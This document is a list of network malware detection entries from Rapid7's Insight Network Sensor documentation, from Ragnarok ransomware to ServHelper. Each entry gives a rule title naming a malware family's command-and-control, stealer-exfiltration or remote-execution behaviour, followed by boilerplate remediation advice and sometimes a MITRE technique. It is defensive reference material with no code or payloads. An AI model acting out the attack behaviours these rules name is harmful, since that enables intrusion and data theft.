ET MALWARE Ragnarok Ransomware CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Ragnarok Ransomware CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE RampantKitten APT TelB Python Variant - CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RampantKitten APT TelB Python Variant - CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ranscam Ransomware Contact Form

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE RansomCrypt Getting Template

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RansomCrypt Intial Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ransomware.Hidden-Tear Variant CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Ransomware Locky CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Locky CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Locky CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Locky CnC Beacon 21 May

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Locky CnC Beacon 4 21 May

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Win32/WinPlock.A CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Win32/WinPlock.A CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Win32/WinPlock.A Successfully Installed CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransom.Win32.Birele.gsg Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Razy Variant Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RCtrl Backdoor CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RDP Brute Force Bot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Reborn Stealer 2021 Exfil attempt via Telegram

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE rechnung zip file download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RedLeaves HOGFISH APT Implant CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red Leaves HTTP CnC Beacon (APT10 implant)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE RedLine - GetArguments Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/dllhost/ac

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/ms/check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/ms/flush

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/nt/sk

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/nt/th

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/win/cab

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/win/wcx

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReflectiveGnome Download Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RegHelper Installation

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RegSubsDat Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Reimageplus Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Remcos Builder License Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Remote Desktop Spy Install Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Request for Malicious .dat File

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Request for utu.dat Likely Ponmocup checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rerdom/Asprox CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Revcode RAT CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Revcode RAT CnC 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRat 2.0 CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Revoyem Ransomware Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Revoyem Ransomware Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE RezoStealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rhabdo CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RHttpCtrl Backdoor CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RocketKitten APT Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RocketMan Win32/Drun

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rogue AV Downloader concat URI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rogue.Win32/FakePAV Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rogue.Win32/Winwebsec Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rogue.Win32/Winwebsec Install 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rootkit TDSS/Alureon Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rostpay Downloader User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rouge Security Software Win32.BHO.egw

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RustyBuer CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE S400 RAT Client Checkin via Discord

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SA Banker Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SAD Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Sage Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Sage Ransomware Checkin Primer

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Saint Bot CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Saker UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sakula/Mivast C2 Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sakula/Mivast RAT CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sakula/Mivast RAT CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sakula/Mivast RAT CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sakula/Mivast RAT CnC Beacon 6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sakula/Mivast RAT CnC Beacon 7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sality - Fake Opera User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sality - Fake Opera User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sality - Fake Opera User-Agent (Opera/8.89)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sality Variant Downloader Activity (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sality Variant Downloader Activity (3)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Command (download)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Command (powershell)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Command (rdp)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Command (update)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (cmd_exec)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (download_exec)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (powershell_exec)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (rdp_exec)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (update_exec)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sasfis Botnet Client Reporting Back to Controller After Command Execution

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Satan/5ss5c Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Scanbox Sending Host Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SEASALT HTTP Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Secure-Soft.Stealer Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sednit/APT28/Sofacy Delphocy CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sednit/AZZY Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sednit Connectivity Check 0 Byte POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sefnit Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sekhmet Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Self-Signed Cert Observed in Various Zbot Strains

Description
Copy link

Recommendation
Copy link

ET MALWARE Send-Safe Bulk Mailer SSL Cert - Observed in Spam Campaigns

Description
Copy link

Recommendation
Copy link

ET MALWARE SepSys/SepSystem Ransomware Style External IP Address Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE SERVER SSL Cert APT1

Description
Copy link

Recommendation
Copy link

ET MALWARE ServHelper CnC Command (Net User)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ServHelper CnC Command (Reg Add)

Description
Copy link

